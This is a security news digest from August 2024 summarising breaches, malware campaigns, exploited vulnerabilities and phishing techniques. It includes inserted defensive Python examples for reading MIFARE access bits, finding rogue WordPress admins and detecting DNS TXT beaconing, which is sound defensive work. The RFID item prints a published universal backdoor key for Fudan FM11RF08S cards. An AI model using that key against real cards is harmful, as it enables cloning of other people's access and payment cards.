          2024-08-22 https://securityaffairs.com/167435/hacking/halliburton-cyberattack.html
US oil giant Halliburton announced that it was hit by a cyberattack that is affecting operations at its Houston, Texas offices. Halliburton, a major U.S. oil company, announced that a cyberattack hit its IT infrastructure, particularly impacting operations at its Houston offices. Halliburton Company is an American multinational corporation and the world’s second largest oil service company which […]

Autosummary: By Pierluigi Paganini, August 22, 2024.


          U.S. CISA adds Dahua IP Camera, Linux Kernel and Microsoft Exchange Server bugs to its Known Exploited Vulnerabilities catalog

          exploits Linux
          2024-08-22 https://securityaffairs.com/167414/uncategorized/u-s-cisa-dahua-ip-camera-linux-kernel-microsoft-exchange-server-bugs-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Dahua IP Camera, Linux Kernel and Microsoft Exchange Server bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: In October 2021, experts warned of the availability of proof of concept (PoC) exploit code […]

Autosummary: The list of affected models is very long; it includes IPC-X3XXX, HX5XXX, HUM7XX, VTO75X95X, VTO65XXX, VTH542XH, PTZ Dome Camera SD1A1, SD22, SD49, SD50, SD52C, SD6AL, Thermal TPC-BF1241, TPC-BF2221, TPC-SD2221, TPC-BF5XXX, TPC-SD8X21, TPC-PT8X21B, NVR1XXX, NVR2XXX, NVR4XXX, NVR5XXX, NVR6XX.


          Hackers are exploiting critical bug in LiteSpeed Cache plugin

          exploits
          2024-08-22 https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-bug-in-litespeed-cache-plugin/
Hackers have already started to exploit the critical-severity vulnerability that affects LiteSpeed Cache, a WordPress plugin used for accelerating response times, a day after technical details became public. [...]



          NGate Android malware relays NFC traffic to steal cash

          exploits
          2024-08-22 https://www.welivesecurity.com/en/eset-research/ngate-android-malware-relays-nfc-traffic-to-steal-cash/
Android malware discovered by ESET Research relays NFC data from victims’ payment cards, via victims’ mobile phones, to the device of a perpetrator waiting at an ATM.

Autosummary: From the samples analyzed, we were able to identify five distinct phishing websites, namely: rb.2f1c0b7d.tbc-app[.]life, geo-4bfa49b2.tbc-app[.]life, rb-62d3a.tbc-app[.]life, csob-93ef49e7a.tbc-app[.]life, george.tbc-app[.]life. The icon and name of each sample has been designed to mimic specific targeted banking apps, further enhancing their deceptive appearance. The technique is based on a tool called NFCGate, designed by students at the Technical University of Darmstadt, Germany, to capture, analyze, or alter NFC traffic; therefore, we named this new malware family NGate. This scenario, however, is generally limited to making small contactless payments at terminal points, depending on the limit set by the bank that issued the card, not for ATM withdrawals, as the latter would require the attacker to have the card’s PIN. During our testing, we successfully relayed the UID from a MIFARE Classic 1K tag, which is typically used for public transport tickets, ID badges, membership or student cards, and similar use cases. Before transitioning to the new malware, which we named NGate, to relay NFC traffic, the attackers formerly used PWA, then WebAPKs, to steal the banking credentials of their victims. This means that a user, whether on a desktop computer, laptop, tablet, or smartphone, can access the same PWA without needing to download a separate app for each device. The malware used, which we have named NGate, has the unique ability to relay data from victims’ payment cards, via a malicious app installed on their Android devices, to the attacker’s rooted Android phone.

Conclusion: ESET researchers have investigated a novel and unique attack scenario that combines well-known methods, such as phishing, with a new malware technique of relaying NFC traffic from victims’ physical payment cards to the attackers’ Android mobile device. This technique could be employed by an attacker attempting to read cards through unattended purses, wallets, backpacks, or smartphone cases that hold cards, particularly in public and crowded places. Using NFCGate, it’s possible to perform an NFC relay attack to read an NFC token in one location and, in real time, access premises in a different location by emulating its UID, as shown in Figure 7. Example of a PWA icon (left) and that of the app it is mimicking (right). PWAs are essentially a type of app, but unlike traditional apps that are downloaded and installed from an app store, PWAs are accessed and used directly within a web browser. However, NGate also prompts its victims to enter sensitive information like their banking client ID, date of birth, and the PIN code for their banking card. They are built using common web programming languages such as HTML (for structure), CSS (for design), and JavaScript (for interactivity), which are the same technologies used to create websites. On Android, supported browsers include Chrome, Firefox, Edge, and Opera.

Technical analysis of NGate malware. Initial access: initial access to the device is gained by deceiving the victim into installing a malicious app, often under the guise of a false assertion that there is an overpayment of income tax that the victim can reclaim.


          Cybersecurity jobs available right now: August 21, 2024

          ciber
          2024-08-21 https://www.helpnetsecurity.com/2024/08/21/cybersecurity-jobs-available-right-now-august-21-2024/

          Associate Cybersecurity Operations Officer UNICC | USA | On-site – View job details The Center aims to provide trusted ICT services and digital business solutions. You will work under the direct supervision and guidance of the Head of Cybersecurity Operations within the Cybersecurity Division and in close collaboration with the CSO teams. Cybersecurity Engineer, Compliance Electrolux | Italy | Hybrid – View job details You’ll leverage your expertise to guide digital product teams and facilitate … More


Autosummary: Cyber Risk Specialist – Compliance, Bayer | Poland | Hybrid – View job details. The Cyber Risk Specialist (Compliance) supervises, delegates, and assists in developing and implementing compliance monitoring methodologies and programs to proactively identify, report, and remediate all compliance risks. Security Researcher, Hunters | Israel | Hybrid – View job details. Hunters are looking for a top-notch security researcher to resolve the toughest issue in cybersecurity: utilizing terabytes of data for detecting attacks, incident investigation, and prioritizing threats.


          McAfee Deepfake Detector combats AI scams and misinformation

          financial
          2024-08-21 https://www.helpnetsecurity.com/2024/08/21/mcafee-deepfake-detector/

          McAfee launched McAfee Deepfake Detector, the latest addition to the company’s suite of AI-powered products. With AI-created videos, or deepfakes, flooding the internet and circulating across social media, we now live in a world where seeing and hearing are no longer believing. To combat the rise in AI scams and misinformation, McAfee is working with Lenovo to bring powerful AI-based deepfake detection capabilities to customers purchasing select Lenovo AI PCs, starting today. To help educate … More


Autosummary: Availability and pricing: McAfee Deepfake Detector is available for English-language detection in select new Lenovo AI PCs, ordered on Lenovo.com and from select local retailers beginning August 21, 2024, in the US, UK, and Australia.


          CERT-UA Warns of New Vermin-Linked Phishing Attacks with PoW Bait

          financial
          2024-08-21 https://thehackernews.com/2024/08/cert-ua-warns-of-new-vermin-linked.html
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of new phishing attacks that aim to infect devices with malware. The activity has been attributed to a threat cluster it tracks as UAC-0020, which is also known as Vermin. The exact scale and scope of the attacks are presently unknown. The attack chains commence with phishing messages with photos of alleged prisoners of war (



          GiveWP WordPress Plugin Vulnerability Puts 100,000+ Websites at Risk

          exploits
          2024-08-21 https://thehackernews.com/2024/08/givewp-wordpress-plugin-vulnerability.html
A maximum-severity security flaw has been disclosed in the WordPress GiveWP donation and fundraising plugin that exposes more than 100,000 websites to remote code execution attacks. The flaw, tracked as CVE-2024-5932 (CVSS score: 10.0), impacts all versions of the plugin prior to version 3.14.2, which was released on August 7, 2024. A security researcher, who goes by the online alias villu164,

Autosummary: An arbitrary file read flaw in the BookingPress appointment booking plugin that allows authenticated attackers, with Subscriber-level access and above, to create arbitrary files and execute arbitrary code or access sensitive information. CVE-2024-5441 (CVSS score: 8.8) -


          A backdoor in millions of Shanghai Fudan Microelectronics RFID cards allows cloning

          industry
          2024-08-21 https://securityaffairs.com/167321/hacking/shanghai-fudan-microelectronics-rfid-cards-backdoor.html
A flaw in millions of RFID cards manufactured by Shanghai Fudan Microelectronics allows these contactless cards to be cloned instantly. Researchers from security firm Quarkslab discovered a backdoor in millions of RFID cards manufactured by the Chinese chip manufacturer Shanghai Fudan Microelectronics. The experts announced the discovery of a hardware backdoor and successfully cracked its […]

Autosummary: By Pierluigi Paganini, August 21, 2024. A396EFA4E24F (Listing 9: FM11RF08S universal backdoor key). “Tests show that once authenticated, we can read all user blocks, even if the trailer block access rights indicate that data blocks are not readable.”
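The Quarkslab quote above contrasts what a sector trailer says about readability with what the backdoor key actually allows. To make that concrete, the following added example (not Quarkslab's code) decodes the three access-condition bytes of a MIFARE Classic 1K sector trailer, following the bit layout and condition tables in NXP's MF1S50 (MIFARE Classic 1K) datasheet, verifies the inverted copies that the card itself enforces, and reports which key may read each block. Both trailers are constructed: the transport configuration FF 07 80, and a locked-down 08 70 FF that marks every data block unreadable, which is exactly the kind of card the quoted test still reads.

```python
# Added example: decode MIFARE Classic sector-trailer access bits.

# Data-block condition (C1, C2, C3) -> keys allowed to READ that block.
# From the "access conditions for data blocks" table in the NXP datasheet.
DATA_BLOCK_READ = {
    (0, 0, 0): "AB", (0, 1, 0): "AB", (1, 0, 0): "AB", (1, 1, 0): "AB",
    (0, 0, 1): "AB", (0, 1, 1): "B",  (1, 0, 1): "B",  (1, 1, 1): "never",
}
# Trailer condition (C1, C2, C3) -> keys allowed to READ key B out of the
# trailer. Key A is never readable in any configuration.
TRAILER_KEYB_READ = {
    (0, 0, 0): "A", (0, 1, 0): "A", (1, 0, 0): "never", (1, 1, 0): "never",
    (0, 0, 1): "A", (0, 1, 1): "never", (1, 0, 1): "never", (1, 1, 1): "never",
}


def decode_access_bits(trailer: bytes) -> list:
    """Return [(C1, C2, C3) for blocks 0..3] from a 16-byte sector trailer.

    Layout of the access bytes (trailer bytes 6, 7, 8):
      byte 6: high nibble = ~C2 for blocks 3..0, low nibble = ~C1 for blocks 3..0
      byte 7: high nibble =  C1 for blocks 3..0, low nibble = ~C3 for blocks 3..0
      byte 8: high nibble =  C3 for blocks 3..0, low nibble =  C2 for blocks 3..0
    Bit i of each nibble belongs to block i. The inverted copies are checked,
    as the card does: a mismatch renders the sector permanently inaccessible.
    """
    if len(trailer) != 16:
        raise ValueError("sector trailer must be 16 bytes")
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    conditions = []
    for blk in range(4):
        c1 = (b7 >> (4 + blk)) & 1
        c2 = (b8 >> blk) & 1
        c3 = (b8 >> (4 + blk)) & 1
        nc1 = (b6 >> blk) & 1
        nc2 = (b6 >> (4 + blk)) & 1
        nc3 = (b7 >> blk) & 1
        if (nc1, nc2, nc3) != (1 - c1, 1 - c2, 1 - c3):
            raise ValueError(f"access bits for block {blk} fail the inverted-copy check")
        conditions.append((c1, c2, c3))
    return conditions


def sector_read_rights(trailer: bytes) -> dict:
    """Map block index -> key(s) the access bits permit to read it.
    Blocks 0..2 are data blocks; block 3 is the trailer, reported as
    whether key B can be read back from it."""
    conditions = decode_access_bits(trailer)
    rights = {blk: DATA_BLOCK_READ[conditions[blk]] for blk in range(3)}
    rights[3] = TRAILER_KEYB_READ[conditions[3]]
    return rights


# Constructed trailers: key A | access bytes | user byte | key B
TRANSPORT_TRAILER = bytes.fromhex("FFFFFFFFFFFF" "FF0780" "69" "FFFFFFFFFFFF")
LOCKED_TRAILER = bytes.fromhex("A0A1A2A3A4A5" "0870FF" "00" "B0B1B2B3B4B5")

if __name__ == "__main__":
    for name, trailer in (("transport", TRANSPORT_TRAILER), ("locked", LOCKED_TRAILER)):
        print(name, decode_access_bits(trailer), sector_read_rights(trailer))
```

A reader that honours these bits would refuse every data block of the locked sector; the Quarkslab observation is that, after authenticating with the backdoor key, the chip returns them anyway, so the trailer is no longer a reliable statement of what the card will disclose.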


          Trinidad and Tobago refloats mystery oil spill tanker

          industry
          2024-08-21 https://www.bbc.com/news/articles/c5y52r5568vo
Some 50,000 barrels of oil have leaked since the ship overturned off the Caribbean nation's coast in February.



          Microchip Technology manufacturing facilities impacted by cyberattack

          industry ciber
          2024-08-21 https://www.helpnetsecurity.com/2024/08/21/microchip-technology-cyberattack/

          American semiconductor manufacturer Microchip Technology Incorporated has had some of its business operations disrupted by a cyberattack. “As a result of the incident, certain of the Company’s manufacturing facilities are operating at less than normal levels, and the Company’s ability to fulfill orders is currently impacted,” the company revealed in a SEC filing on Tuesday. What is known about the cyberattack? Microchip Technology detected potentially suspicious activity involving its IT systems on August 17, 2024. … More


Autosummary: Its products are used by companies in a variety of industries, including automotive, communications, computing, medical, aerospace and defense.


          New macOS Malware TodoSwift Linked to North Korean Hacking Groups

          exploits
          2024-08-21 https://thehackernews.com/2024/08/new-macos-malware-todoswift-linked-to.html
Cybersecurity researchers have uncovered a new macOS malware strain dubbed TodoSwift that they say exhibits commonalities with known malicious software used by North Korean hacking groups. "This application shares several behaviors with malware we've seen that originated in North Korea (DPRK) — specifically the threat actor known as BlueNoroff — such as KANDYKORN and RustBucket," Kandji security

Autosummary: "The DPRK, via units like the Lazarus Group, continues to target crypto-industry businesses with the goal of stealing cryptocurrency in order to circumvent international sanctions that hinder the growth of their economy and ambitions," Elastic said at the time.


          Pro-Russia group Vermin targets Ukraine with a new malware family

          exploits
          2024-08-21 https://securityaffairs.com/167327/apt/cer-ua-vermin-phishing-campaign.html
The Computer Emergency Response Team of Ukraine (CERT-UA) warned of new phishing attacks, carried out by the Vermin group, distributing malware. The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign conducted by the Vermin group that distributed malware. Vermin is a pro-Russian hacker group, also tracked as UAC-0020, that operates under […]

Autosummary: “The PowerShell code is designed to download components of the SPECTR malware (which steals documents, screenshots, browser data, etc.) and a new program called FIRMACHAGENT (“chrome_updater.dll,” primarily tasked with uploading stolen data to a command server).”


          QNAP adds NAS ransomware protection to latest QTS version

          exploits ransomware
2024-08-21 https://www.bleepingcomputer.com/news/security/qnap-adds-nas-ransomware-protection-to-latest-qts-version/
Taiwanese hardware vendor QNAP has added a Security Center with ransomware protection capabilities to the latest version of its QTS operating system for network-attached storage (NAS) devices. [...]



          Litespeed Cache bug exposes millions of WordPress sites to takeover attacks

          exploits
          2024-08-21 https://www.bleepingcomputer.com/news/security/litespeed-cache-bug-exposes-millions-of-wordpress-sites-to-takeover-attacks/
A critical vulnerability in the LiteSpeed Cache WordPress plugin can let attackers take over millions of websites after creating rogue admin accounts. [...]

Autosummary: Successful exploitation enables any unauthenticated visitor to gain administrator-level access, which can be used to completely take over websites running vulnerable LiteSpeed Cache versions by installing malicious plugins, changing critical settings, redirecting traffic to malicious websites, distributing malware to visitors, or stealing user data.
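The rogue admin account described above is the artefact a responder can hunt for in the site's database. The following is an added example, not BleepingComputer's or LiteSpeed's code: it runs the hunt query against an in-memory SQLite copy of the relevant wp_users and wp_usermeta columns populated with constructed rows. The default wp_ table prefix and the PHP-serialised wp_capabilities role format are assumptions about a stock WordPress install; on a real site the same SQL runs unchanged against MySQL.

```python
# Added example: find administrator accounts registered after a given time.
import sqlite3
from datetime import datetime

# WordPress stores each user's roles in wp_usermeta under meta_key
# 'wp_capabilities' as a PHP-serialised array; an administrator entry
# contains s:13:"administrator";b:1; (the length prefix makes it a stable
# substring to match). The 'wp_' prefix is the stock default (assumed).
ADMIN_MARKER = 's:13:"administrator";b:1;'


def build_sample_db() -> sqlite3.Connection:
    """Constructed subset of wp_users / wp_usermeta, for demonstration only."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (
            ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT,
            user_registered TEXT);
        CREATE TABLE wp_usermeta (
            umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
            meta_key TEXT, meta_value TEXT);
    """)
    users = [
        (1, "siteowner", "owner@example.test", "2021-03-02 10:15:00"),
        (2, "editor_jane", "jane@example.test", "2023-07-19 08:00:00"),
        (3, "wpuser", "x@mailer.test", "2024-08-20 23:41:07"),  # constructed rogue admin
        (4, "subscriber_bob", "bob@example.test", "2024-08-21 09:05:00"),
    ]
    caps = [
        (1, 'a:1:{s:13:"administrator";b:1;}'),
        (2, 'a:1:{s:6:"editor";b:1;}'),
        (3, 'a:1:{s:13:"administrator";b:1;}'),
        (4, 'a:1:{s:10:"subscriber";b:1;}'),
    ]
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?)", users)
    conn.executemany(
        "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) "
        "VALUES (?, 'wp_capabilities', ?)",
        caps,
    )
    return conn


def find_new_admins(conn: sqlite3.Connection, since: str, known_admins=()) -> list:
    """Return (login, email, registered) for administrator accounts registered
    at or after `since` (YYYY-MM-DD HH:MM:SS), excluding logins in `known_admins`.
    Use the plugin's advisory date, or the earliest suspicious access-log entry,
    as `since`."""
    datetime.strptime(since, "%Y-%m-%d %H:%M:%S")  # reject malformed input early
    rows = conn.execute(
        """
        SELECT u.user_login, u.user_email, u.user_registered
        FROM wp_users u
        JOIN wp_usermeta m ON m.user_id = u.ID
        WHERE m.meta_key = 'wp_capabilities'
          AND m.meta_value LIKE '%' || ? || '%'
          AND u.user_registered >= ?
        ORDER BY u.user_registered
        """,
        (ADMIN_MARKER, since),
    ).fetchall()
    known = set(known_admins)
    return [row for row in rows if row[0] not in known]


if __name__ == "__main__":
    db = build_sample_db()
    for login, email, when in find_new_admins(db, "2024-08-19 00:00:00", known_admins=("siteowner",)):
        print(f"suspect admin: {login} <{email}> registered {when}")
```

A hit is a lead, not a verdict: confirm against the web server's access log for the POST that created the account, and remember that an attacker who already has admin can also re-register an existing account, so pair this with a review of wp_usermeta changes for accounts created before `since`.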


          Microsoft Patches Critical Copilot Studio Vulnerability Exposing Sensitive Data

          exploits
          2024-08-21 https://thehackernews.com/2024/08/microsoft-patches-critical-copilot.html
Cybersecurity researchers have disclosed a critical security flaw impacting Microsoft's Copilot Studio that could be exploited to access sensitive information. Tracked as CVE-2024-38206 (CVSS score: 8.5), the vulnerability has been described as an information disclosure bug stemming from a server-side request forgery (SSRF) attack. "An authenticated attacker can bypass Server-Side Request



          North Korean Hackers Deploy New MoonPeak Trojan in Cyber Campaign

          exploits
          2024-08-21 https://thehackernews.com/2024/08/north-korean-hackers-deploy-new.html
A new remote access trojan called MoonPeak has been discovered as being used by a state-sponsored North Korean threat activity cluster as part of a new campaign. Cisco Talos attributed the malicious cyber campaign to a hacking group it tracks as UAT-5394, which it said exhibits some level of tactical overlaps with a known nation-state actor codenamed Kimsuky. MoonPeak, under active development



          Man sentenced for hacking state registry to fake his own death

          government
          2024-08-21 https://www.bleepingcomputer.com/news/legal/man-sentenced-for-hacking-state-registry-to-fake-his-own-death/
A 39-year-old man from Somerset, Kentucky, was sentenced to 81 months in federal prison for identity theft and faking his own death in government registry systems. [...]



          Google fixes ninth Chrome zero-day exploited in attacks this year

          exploits
2024-08-21 https://www.bleepingcomputer.com/news/security/google-fixes-tenth-actively-exploited-chrome-zero-day-in-2024/
Today, Google released a new Chrome emergency security update to patch a zero-day vulnerability, the ninth one exploited in attacks this year. [...]



          Hackers steal banking creds from iOS, Android users via PWA apps

          financial
          2024-08-21 https://www.bleepingcomputer.com/news/security/hackers-steal-banking-creds-from-ios-android-users-via-pwa-apps/
Threat actors started to use progressive web applications to impersonate banking apps and steal credentials from Android and iOS users. [...]

Autosummary: The malicious WebAPK (left) and the phishing login page (right). Source: ESET. The appeal of using PWAs on mobile: PWAs are designed to work across multiple platforms, so attackers can target a broader audience through a single phishing campaign and payload.


          Google fixes ninth Chrome zero-day exploited in attacks this year

          exploits
2024-08-21 https://www.bleepingcomputer.com/news/security/google-fixes-ninth-actively-exploited-chrome-zero-day-in-2024/
Today, Google released a new Chrome emergency security update to patch a zero-day vulnerability, the ninth one tagged as exploited this year. [...]



Brazil police close investigation into Man Utd's Antony

          latam
          2024-08-21 https://www.bbc.com/sport/football/articles/cx2e9x028jqo
A Brazilian police investigation into allegations of domestic abuse by Manchester United winger Antony is closed, though prosecutors could still look into the claims.



          Windows driver zero-day exploited by Lazarus hackers to install rootkit

          exploits
          2024-08-20 https://www.bleepingcomputer.com/news/microsoft/windows-driver-zero-day-exploited-by-lazarus-hackers-to-install-rootkit/
The notorious North Korean Lazarus hacking group exploited a zero-day flaw in the Windows AFD.sys driver to elevate privileges and install the FUDModule rootkit on targeted systems. [...]

Autosummary: The flaw was discovered by Gen Digital researchers, who say that the Lazarus hacking group exploited the AFD.sys flaw as a zero-day to install the FUDModule rootkit, used to evade detection by turning off Windows monitoring features.


          Organizations turn to biometrics to counter deepfakes

          industry
          2024-08-20 https://www.helpnetsecurity.com/2024/08/20/deepfakes-threat/

The risk of deepfakes is rising, with 47% of organizations having encountered a deepfake and 70% of them believing that deepfake attacks, which are created using generative AI tools, will have a high impact on their organizations, according to iProov. Perceptions of AI are hopeful: 68% of organizations believe that while it’s impactful at creating cybersecurity threats, 84% find it’s instrumental in protecting against them. This is according to a new global survey of technology … More


Autosummary: Unsurprisingly, deepfakes are now tied for third place amongst the most prevalent concerns for survey respondents, in the following order: password breaches (64%), ransomware (63%), phishing/social engineering attacks (61%), and deepfakes (61%). APAC (81%), European (72%), and North American (71%) organizations are significantly more likely than LATAM organizations (54%) to believe deepfake attacks will have an impact on their organization.


          Cybercriminals exploit file sharing services to advance phishing attacks

          financial exploits ciber
          2024-08-20 https://www.helpnetsecurity.com/2024/08/20/file-sharing-phishing-attacks/

          Threat actors use popular file-hosting or e-signature solutions as a disguise to manipulate their targets into revealing private information or downloading malware, according to Abnormal Security. A file-sharing phishing attack is a unique type of phishing threat in which a cybercriminal poses as a known colleague or familiar file-hosting or e-signature solution and sends a target a malicious email containing a link to what appears to be a shared file or document. Should the recipient … More


Autosummary: The majority of these attacks were sophisticated in nature, with 60% exploiting legitimate domains, most commonly webmail accounts such as Gmail, iCloud, and Outlook; productivity and collaboration platforms; file storage and sharing platforms like Dropbox; and e-signature solutions like Docusign.


          Strategies for security leaders: Building a positive cybersecurity culture

          ciber
          2024-08-20 https://www.helpnetsecurity.com/2024/08/20/cybersecurity-culture-strategies/

          Culture is a catalyst for security success. It can significantly reduce cybersecurity risks and boost cybersecurity resilience of any organization. Culture can also greatly enhance the perceived value, relevance and reputation of the cybersecurity function. So how can security leaders develop a positive brand and culture for cybersecurity? Listed below are some recommendations and best practices: 1. Understand the prevailing culture and context To understand why the workforce behaves in a certain way about technology … More


Autosummary: For example, any regional cultural differences, the particular industry sector, the underlying company structure, the lack of awareness and knowledge of security norms, and conflicting business priorities can all weigh on any planned change to team culture and security behaviors. 3. Set clear goals and aspirations: as part of the design blueprint for security culture change, the security leader should set clear aspirations for what the team is trying to achieve, underpinned by conversations about how the culture underscores the effectiveness of the team, and the importance of making the change.


          Blind Eagle Hackers Exploit Spear-Phishing to Deploy RATs in Latin America

          financial exploits
          2024-08-20 https://thehackernews.com/2024/08/blind-eagle-hackers-exploit-spear.html
Cybersecurity researchers have shed light on a threat actor known as Blind Eagle that has persistently targeted entities and individuals in Colombia, Ecuador, Chile, Panama, and other Latin American nations. Targets of these attacks span several sectors, including government institutions, financial companies, and energy and oil and gas companies. "Blind Eagle has demonstrated adaptability in …

Autosummary: The suspected Spanish-speaking group is known for using spear-phishing lures to distribute various publicly available remote access trojans such as AsyncRAT, BitRAT, Lime RAT, NjRAT, Quasar RAT, and Remcos RAT.


          CISA Warns of Critical Jenkins Vulnerability Exploited in Ransomware Attacks

          exploits ransomware
          2024-08-20 https://thehackernews.com/2024/08/cisa-warns-of-critical-jenkins.html
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw impacting Jenkins to its Known Exploited Vulnerabilities (KEV) catalog, following its exploitation in ransomware attacks. The vulnerability, tracked as CVE-2024-23897 (CVSS score: 9.8), is a path traversal flaw in the Jenkins command-line interface (CLI) that can lead to code execution. "Jenkins Command Line Interface (CLI) contains a …


          Toyota disclosed a data breach after ZeroSevenGroup leaked stolen data on a cybercrime forum

          financial
          2024-08-20 https://securityaffairs.com/167274/uncategorized/zerosevengroup-toyota-data-breach.html
Toyota has confirmed a data breach after a threat actor leaked 240GB of data stolen from its infrastructure on a cybercrime forum, BleepingComputer reported. The threat actor, ZeroSevenGroup, claims to have […]

Autosummary: “Contents: Everything like Contacts, Finance, Customers, Schemes, Employees, Photos, DBs, Network infrastructure, Emails, and a lot of perfect data.”


          GuidePoint Security releases Phishing as a Service

          financial
          2024-08-20 https://www.helpnetsecurity.com/2024/08/20/guidepoint-security-phishing-as-a-service/

GuidePoint Security has launched a new Phishing as a Service (PhaaS) offering. Phishing remains one of the most common entry points for threat actors; according to CISA, over 90% of successful cyberattacks start with a phishing email. However, managing simulation platforms and crafting convincing, efficient campaigns takes time and energy that many security teams lack. By putting phishing simulation tools into the hands of experienced Attack Simulation Operators, GuidePoint Security’s new Phishing as a …


          Hackers Exploit PHP Vulnerability to Deploy Stealthy Msupedge Backdoor

          exploits
          2024-08-20 https://thehackernews.com/2024/08/hackers-exploit-php-vulnerability-to.html
A previously undocumented backdoor named Msupedge has been used in a cyber attack targeting an unnamed university in Taiwan. "The most notable feature of this backdoor is that it communicates with a command-and-control (C&C) server via DNS traffic," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News. The origins of the backdoor are …

Autosummary: The commands supported by Msupedge are listed below:
0x8a: Create a process using a command received via a DNS TXT record
0x75: Download a file using a download URL received via a DNS TXT record
0x24: Sleep for a predetermined time interval
0x66: Sleep for a predetermined time interval
0x38: Create a temporary file "%temp%\1e5bf625-1678-zzcv-90b1-199aa47c345.tmp", whose purpose is unknown
0x3c: …
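The DNS-based command channel described above is the kind of traffic a resolver log can surface. The following is an added example, not Symantec's detection logic: it scores each client's TXT queries per base domain by volume and by the randomness of the subdomain labels, which is what a backdoor that pulls commands and download URLs out of TXT records tends to look like. The log format, the sample records, the thresholds and the function names are all assumptions.

```python
"""Flag clients whose DNS traffic looks like TXT-record command polling.

Added example for the Msupedge DNS C&C behaviour described above; it is not
Symantec's detection content. The log format (timestamp, client, query name,
query type), the sample records and the thresholds are all constructed.
"""
import math
from collections import defaultdict

# Constructed resolver log: one query per line.
SAMPLE_LOG = """\
2024-08-20T10:00:01Z 10.0.0.5 www.example.com A
2024-08-20T10:00:02Z 10.0.0.5 _dmarc.example.com TXT
2024-08-20T10:00:03Z 10.0.0.7 www.example.com A
2024-08-20T10:00:05Z 10.0.0.7 k3j9x2m1.c2-example.net TXT
2024-08-20T10:00:35Z 10.0.0.7 p8q2z7r4.c2-example.net TXT
2024-08-20T10:01:05Z 10.0.0.7 a5b6c7d8.c2-example.net TXT
2024-08-20T10:01:35Z 10.0.0.7 h2t9w4e1.c2-example.net TXT
2024-08-20T10:02:05Z 10.0.0.7 m7n3v8u2.c2-example.net TXT
2024-08-20T10:02:35Z 10.0.0.7 z1y4x9q6.c2-example.net TXT
2024-08-20T10:02:40Z 10.0.0.5 mail.example.com MX
"""


def shannon_entropy(text: str) -> float:
    """Bits per character of the given string (0.0 for an empty string)."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def split_name(qname: str) -> tuple:
    """Split 'k3j9x2m1.c2-example.net' into ('k3j9x2m1', 'c2-example.net').

    Simplification: the base domain is taken as the last two labels, which is
    wrong for suffixes like co.uk; use a public-suffix list in production.
    """
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text: str):
    """Yield (client, qname, qtype) for each well-formed log line."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 4:
            _, client, qname, qtype = fields
            yield client, qname.lower(), qtype.upper()


def find_txt_beacons(log_text: str, min_txt: int = 5, min_entropy: float = 2.5) -> list:
    """Return (client, base_domain, txt_count, mean_label_entropy) for every
    client/domain pair with at least `min_txt` TXT queries whose subdomain
    labels look machine-generated (mean entropy >= `min_entropy`)."""
    entropies = defaultdict(list)
    for client, qname, qtype in parse_log(log_text):
        if qtype != "TXT":
            continue
        sub, base = split_name(qname)
        entropies[(client, base)].append(shannon_entropy(sub.replace(".", "")))
    hits = []
    for (client, base), values in entropies.items():
        mean = round(sum(values) / len(values), 2)
        if len(values) >= min_txt and mean >= min_entropy:
            hits.append((client, base, len(values), mean))
    return sorted(hits)


if __name__ == "__main__":
    for client, base, count, mean in find_txt_beacons(SAMPLE_LOG):
        print(f"{client} -> {base}: {count} TXT queries, mean label entropy {mean}")
```

Tune `min_txt` to the polling interval you expect over the window you analyse; legitimate TXT lookups (SPF, DMARC, domain-verification records) are few per client and use dictionary labels, so they stay below both thresholds. Replace the two-label base-domain shortcut with a public-suffix lookup before running this over real logs.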


          Iranian Cyber Group TA453 Targets Jewish Leader with New AnvilEcho Malware

          exploits
          2024-08-20 https://thehackernews.com/2024/08/iranian-cyber-group-ta453-targets.html
Iranian state-sponsored threat actors have been observed orchestrating spear-phishing campaigns targeting a prominent Jewish figure starting in late July 2024 with the goal of delivering a new intelligence-gathering tool called AnvilEcho. Enterprise security company Proofpoint is tracking the activity under the name TA453, which overlaps with activity tracked by the broader cybersecurity community under the monikers APT42 (Mandiant), Charming Kitten (CrowdStrike), Damselfly (Symantec), Mint Sandstorm (Microsoft), and Yellow Garuda (PwC).

Autosummary: Some of AnvilEcho's important functions include conducting system reconnaissance, taking screenshots, downloading remote files, and uploading sensitive data over FTP and Dropbox. "TA453 phishing campaigns [...] have consistently reflected IRGC intelligence priorities," Proofpoint researcher Joshua Miller said in a statement shared with The Hacker News.


          Toyota disclosed a data breach after ZeroSevenGroup leaked stolen data on a cybercrime forum

          financial
          2024-08-20 https://securityaffairs.com/167274/data-breach/zerosevengroup-toyota-data-breach.html
Toyota has confirmed a data breach after a threat actor leaked 240GB of data stolen from its infrastructure on a cybercrime forum, BleepingComputer reported. The threat actor, ZeroSevenGroup, claims to have […]

Autosummary: “Contents: Everything like Contacts, Finance, Customers, Schemes, Employees, Photos, DBs, Network infrastructure, Emails, and a lot of perfect data.”


          Panama starts returning migrants on US-funded flights

          latam
          2024-08-20 https://www.bbc.com/news/articles/cqjlqk0wv1no
Under an agreement between the US and Panama, undocumented migrants will be sent back to Colombia.


          New phishing method targets Android and iPhone users

          financial
          2024-08-20 https://www.helpnetsecurity.com/2024/08/20/android-iphone-phishing-campaign/

ESET researchers discovered an uncommon type of phishing campaign targeting Android and iPhone users. They analyzed a case observed in the wild that targeted clients of a prominent Czech bank. (Figure: PWA phishing flow. Source: ESET.) This technique is noteworthy because it installs a phishing application from a third-party website without the user having to allow third-party app installation. On Android, this can result in the silent installation of a special kind of APK, which even …

